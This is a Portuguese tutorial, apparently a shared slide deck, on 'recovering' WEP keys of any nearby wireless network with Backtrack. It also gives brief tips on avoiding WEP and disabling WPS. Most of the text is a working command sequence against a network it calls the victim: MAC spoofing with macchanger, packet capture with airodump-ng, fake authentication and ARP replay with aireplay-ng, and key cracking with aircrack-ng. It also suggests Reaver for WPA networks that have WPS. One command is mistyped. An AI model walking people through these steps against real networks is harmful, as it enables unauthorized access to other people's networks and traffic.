Como recuperar senhas WEP de redes wireless com Backtrack

Preview:

DESCRIPTION

Tutorial sobre como recuperar senhas wep e dicas de como se proteger de ataques para ingresso não autorizado em redes wireles

Citation preview

Como recuperar senha WEP de redes wireless

com BacktrackSim. Recuperar.

Do que você vai precisar?

• Um adaptador wireless compatível• Um CD/DVD com Backtrack• Uma rede WEP próxima• Paciência com os comandos (MUITA)

Quanto tempo leva?

• Depende do hardware e da conexão• 5 – 20 min (não calculando o tempo que se leva digitando comandos)

Funciona com redes WPA?

• Este método não funciona• Use Reaver, também no Backtrack• Se você tiver sorte leva 2,5h• Documentação oficial sugere de 4 a 10 horas• Depende do hardware e da conexão também• Depende do tamanho da chave de criptografia, pois é força-bruta• O Access Point/Hot spot deve ter WPS (Wi-Fi Protected Setup)

Como se proteger?

• Não use WEP, apenas WPA• Se houver WPS, desabilite-o• Não compre router com WPS

Passo 1 – Identificar interface

• Abra o console

> airmon-ng

• Resultado = (interface) utilizada para o ataque (ex. ra0, wlan0)

Passo 2 – Falsificar o MAC

> airmon-ng stop (interface) // prepara parada da interface> ifconfig (interface) down // desativa o dispositivo de rede> macchanger --mac 00:11:22:33:44:55 (interface) // muda o MAC> airmon-ng start (interface) // reativa interface

• Se tudo ocorreu bem, você falsificou seu MAC!

Passo 3 – Identificar a vítima

> airodump-ng (interface)

• Mostrará uma lista de todas as redes no alcance• Copie o Nome da rede (name), BSSID e CH (channel)

Passo 4 – Sniffar tudo

> airodump-np –c (channel) –w (name) --bssid (bssid) (interface)

• Isso vai pegar todos os pacotes e colocar tudo em um arquivo chamado (name)

Passo 5 – Entrar na rede

• Abra um novo console (deixe o outro aberto sniffando)

> aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (name) (interface)

• No final deve aparecer “Association Successful : )” • Entramos na rede! Mas não acabou...

Passo 6 – Entrar na rede

• Precisamos sniffar uma quantidade maior de pacotes para o programa conseguir a senha da rede definitivamente

> aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

• Criamos uma rota de tráfego para a captura ser mais rápida• Observe a coluna #Data incrementar mais rápido, precisamos que

passe de 10.000 pacotes!

Passo 7 – Hora da verdade

• Abre um terceiro console

> aircrack-ng -b (bssid) (name-01.cap)

• Se não houver pacotes suficientes vai abortar• Se estiver tudo certo vai aparecer “KEY FOUND” seguido da senha

WEP da rede em questão